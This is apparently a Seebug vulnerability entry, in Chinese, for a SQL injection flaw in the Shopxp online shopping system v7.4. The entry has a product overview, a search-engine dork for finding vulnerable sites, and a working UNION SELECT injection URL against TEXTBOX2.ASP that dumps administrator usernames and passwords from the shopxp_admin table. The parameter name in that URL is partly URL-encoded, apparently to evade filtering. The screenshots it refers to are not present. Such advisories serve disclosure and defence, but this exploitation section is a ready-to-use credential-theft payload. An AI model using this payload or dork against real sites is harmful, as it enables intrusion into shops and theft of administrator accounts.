shopxp网上购物系统 v7.4 SQL注入漏洞

2011-05-20T00:00:00
ID SSV:20570
Type seebug
Reporter Root
Modified 2011-05-20T00:00:00

Description

0x01 框架概述

Shopxp网上购物系统是一个经过完善设计的经典商城购物管理系统,适用于各种服务器环境的高效网上购物网站建设解决方案。Shopxp 网店系统具有丰富的 web 应用程序设计经验,尤其在购物系统产品及相关领域,经过长期创新性开发,掌握了一整套从算法,数据结构到产品安全性方面的领先技术,使得shopxp 商城系统无论在稳定性、负载能力、安全保障等方面都居于国内外同类产品领先地位。

开发语言:ASP

软件语言:简体中文

数据库:Access、Mssql

关键字:inurl:shopxp_news.asp

0x02 漏洞利用

注入代码:TEXTBOX2.ASP?action=modify&news%69d=122%20and%201=2%20union%20select%201,2,admin%2b';;!!;;'%2bpassword%2b';;!!;;',4,5,6,7%20from%20shopxp_admin

爆出用户名和密码

本地环境示意如下:

利用payload爆出用户名密码如下

Pocsuite证明截图如下

0x03 参考链接

http://www.myhack58.com/Article/html/3/62/2012/34043.htm